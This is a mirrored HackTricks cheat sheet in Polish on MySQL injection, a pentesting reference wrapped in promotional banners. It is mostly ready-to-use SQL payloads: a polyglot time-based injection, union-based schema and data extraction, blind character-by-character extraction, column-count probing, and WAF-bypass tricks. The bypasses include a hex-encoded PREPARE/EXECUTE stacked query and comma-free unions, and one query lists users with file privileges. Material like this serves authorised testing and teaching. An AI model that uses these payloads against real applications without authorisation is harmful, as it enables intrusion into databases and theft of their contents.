mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-12 21:28:55 +00:00
196 lines
9.6 KiB
Markdown
196 lines
9.6 KiB
Markdown
|
# MySQL injection
|
|||
|
|
|||
|
{% hint style="success" %}
|
|||
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|||
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary>Wsparcie HackTricks</summary>
|
|||
|
|
|||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
|||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|||
|
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
|
|||
|
|
|||
|
</details>
|
|||
|
{% endhint %}
|
|||
|
|
|||
|
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
[**RootedCON**](https://www.rootedcon.com/) to najważniejsze wydarzenie związane z cyberbezpieczeństwem w **Hiszpanii** i jedno z najważniejszych w **Europie**. Z **misją promowania wiedzy technicznej**, ten kongres jest gorącym punktem spotkań dla profesjonalistów z dziedziny technologii i cyberbezpieczeństwa w każdej dyscyplinie.
|
|||
|
|
|||
|
{% embed url="https://www.rootedcon.com/" %}
|
|||
|
|
|||
|
## Komentarze
|
|||
|
```sql
|
|||
|
-- MYSQL Comment
|
|||
|
# MYSQL Comment
|
|||
|
/* MYSQL Comment */
|
|||
|
/*! MYSQL Special SQL */
|
|||
|
/*!32302 10*/ Comment for MySQL version 3.23.02
|
|||
|
```
|
|||
|
## Ciekawe Funkcje
|
|||
|
|
|||
|
### Potwierdź Mysql:
|
|||
|
```
|
|||
|
concat('a','b')
|
|||
|
database()
|
|||
|
version()
|
|||
|
user()
|
|||
|
system_user()
|
|||
|
@@version
|
|||
|
@@datadir
|
|||
|
rand()
|
|||
|
floor(2.9)
|
|||
|
length(1)
|
|||
|
count(1)
|
|||
|
```
|
|||
|
### Przydatne funkcje
|
|||
|
```sql
|
|||
|
SELECT hex(database())
|
|||
|
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
|
|||
|
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
|
|||
|
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
|
|||
|
SELECT replace(database(),"r","R")
|
|||
|
SELECT substr(database(),1,1)='r'
|
|||
|
SELECT substring(database(),1,1)=0x72
|
|||
|
SELECT ascii(substring(database(),1,1))=114
|
|||
|
SELECT database()=char(114,101,120,116,101,115,116,101,114)
|
|||
|
SELECT group_concat(<COLUMN>) FROM <TABLE>
|
|||
|
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
|
|||
|
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
|
|||
|
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
|
|||
|
```
|
|||
|
## Wszystkie wstrzyknięcia
|
|||
|
```sql
|
|||
|
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
|
|||
|
```
|
|||
|
from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
|
|||
|
|
|||
|
## Flow
|
|||
|
|
|||
|
Pamiętaj, że w "nowoczesnych" wersjach **MySQL** możesz zastąpić "_**information\_schema.tables**_" przez "_**mysql.innodb\_table\_stats**_**"** (To może być przydatne do obejścia WAF-ów).
|
|||
|
```sql
|
|||
|
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
|
|||
|
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
|
|||
|
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
|
|||
|
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
|
|||
|
```
|
|||
|
### **Tylko 1 wartość**
|
|||
|
|
|||
|
* `group_concat()`
|
|||
|
* `Limit X,1`
|
|||
|
|
|||
|
### **Ślepy jeden po drugim**
|
|||
|
|
|||
|
* `substr(version(),X,1)='r'` lub `substring(version(),X,1)=0x70` lub `ascii(substr(version(),X,1))=112`
|
|||
|
* `mid(version(),X,1)='5'`
|
|||
|
|
|||
|
### **Ślepe dodawanie**
|
|||
|
|
|||
|
* `LPAD(version(),1...lenght(version()),'1')='asd'...`
|
|||
|
* `RPAD(version(),1...lenght(version()),'1')='asd'...`
|
|||
|
* `SELECT RIGHT(version(),1...lenght(version()))='asd'...`
|
|||
|
* `SELECT LEFT(version(),1...lenght(version()))='asd'...`
|
|||
|
* `SELECT INSTR('foobarbar', 'fo...')=1`
|
|||
|
|
|||
|
## Wykryj liczbę kolumn
|
|||
|
|
|||
|
Używając prostego ORDER
|
|||
|
```
|
|||
|
order by 1
|
|||
|
order by 2
|
|||
|
order by 3
|
|||
|
...
|
|||
|
order by XXX
|
|||
|
|
|||
|
UniOn SeLect 1
|
|||
|
UniOn SeLect 1,2
|
|||
|
UniOn SeLect 1,2,3
|
|||
|
...
|
|||
|
```
|
|||
|
## MySQL Union Based
|
|||
|
```sql
|
|||
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
|||
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
|||
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
|||
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
|||
|
```
|
|||
|
## SSRF
|
|||
|
|
|||
|
**Dowiedz się tutaj o różnych opcjach, aby** [**nadużyć wstrzyknięcia Mysql, aby uzyskać SSRF**](mysql-ssrf.md)**.**
|
|||
|
|
|||
|
## Sztuczki omijania WAF
|
|||
|
|
|||
|
### Wykonywanie zapytań za pomocą przygotowanych instrukcji
|
|||
|
|
|||
|
Gdy dozwolone są zagnieżdżone zapytania, może być możliwe ominięcie WAF-ów, przypisując do zmiennej szesnastkową reprezentację zapytania, które chcesz wykonać (używając SET), a następnie używając instrukcji PREPARE i EXECUTE MySQL, aby ostatecznie wykonać zapytanie. Coś takiego:
|
|||
|
```
|
|||
|
0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
|
|||
|
```
|
|||
|
For more information please refer to [this blog post](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce).
|
|||
|
|
|||
|
### Alternatywy\_information\_schema
|
|||
|
|
|||
|
Pamiętaj, że w "nowoczesnych" wersjach **MySQL** możesz zastąpić _**information\_schema.tables**_ _**mysql.innodb\_table\_stats**_ lub _**sys.x$schema\_flattened\_keys**_ lub **sys.schema\_table\_statistics**
|
|||
|
|
|||
|
### MySQLinjection bez PRZECINKÓW
|
|||
|
|
|||
|
Wybierz 2 kolumny bez użycia przecinka ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
|
|||
|
```
|
|||
|
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
|
|||
|
```
|
|||
|
### Pobieranie wartości bez nazwy kolumny
|
|||
|
|
|||
|
Jeśli w pewnym momencie znasz nazwę tabeli, ale nie znasz nazw kolumn w tabeli, możesz spróbować znaleźć, ile kolumn tam jest, wykonując coś takiego:
|
|||
|
```bash
|
|||
|
# When a True is returned, you have found the number of columns
|
|||
|
select (select "", "") = (SELECT * from demo limit 1); # 2columns
|
|||
|
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
|
|||
|
```
|
|||
|
Zakładając, że są 2 kolumny (pierwsza to ID, a druga to flaga), możesz spróbować brute force'ować zawartość flagi, próbując znak po znaku:
|
|||
|
```bash
|
|||
|
# When True, you found the correct char and can start ruteforcing the next position
|
|||
|
select (select 1, 'flaf') = (SELECT * from demo limit 1);
|
|||
|
```
|
|||
|
Więcej informacji w [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
|
|||
|
|
|||
|
### Historia MySQL
|
|||
|
|
|||
|
Możesz zobaczyć inne wykonania w MySQL, odczytując tabelę: **sys.x$statement\_analysis**
|
|||
|
|
|||
|
### Alternatywne wersje**s**
|
|||
|
```
|
|||
|
mysql> select @@innodb_version;
|
|||
|
mysql> select @@version;
|
|||
|
mysql> select version();
|
|||
|
```
|
|||
|
## Inne przewodniki dotyczące wstrzykiwania MYSQL
|
|||
|
|
|||
|
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
|
|||
|
|
|||
|
## Odniesienia
|
|||
|
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
|
|||
|
|
|||
|
|
|||
|
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
[**RootedCON**](https://www.rootedcon.com/) to najważniejsze wydarzenie związane z cyberbezpieczeństwem w **Hiszpanii** i jedno z najważniejszych w **Europie**. Z **misją promowania wiedzy technicznej**, ten kongres jest gorącym punktem spotkań dla profesjonalistów z dziedziny technologii i cyberbezpieczeństwa w każdej dyscyplinie.
|
|||
|
|
|||
|
{% embed url="https://www.rootedcon.com/" %}
|
|||
|
|
|||
|
{% hint style="success" %}
|
|||
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|||
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary>Wsparcie HackTricks</summary>
|
|||
|
|
|||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
|||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|||
|
* **Dziel się sztuczkami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
|
|||
|
|
|||
|
</details>
|
|||
|
{% endhint %}
|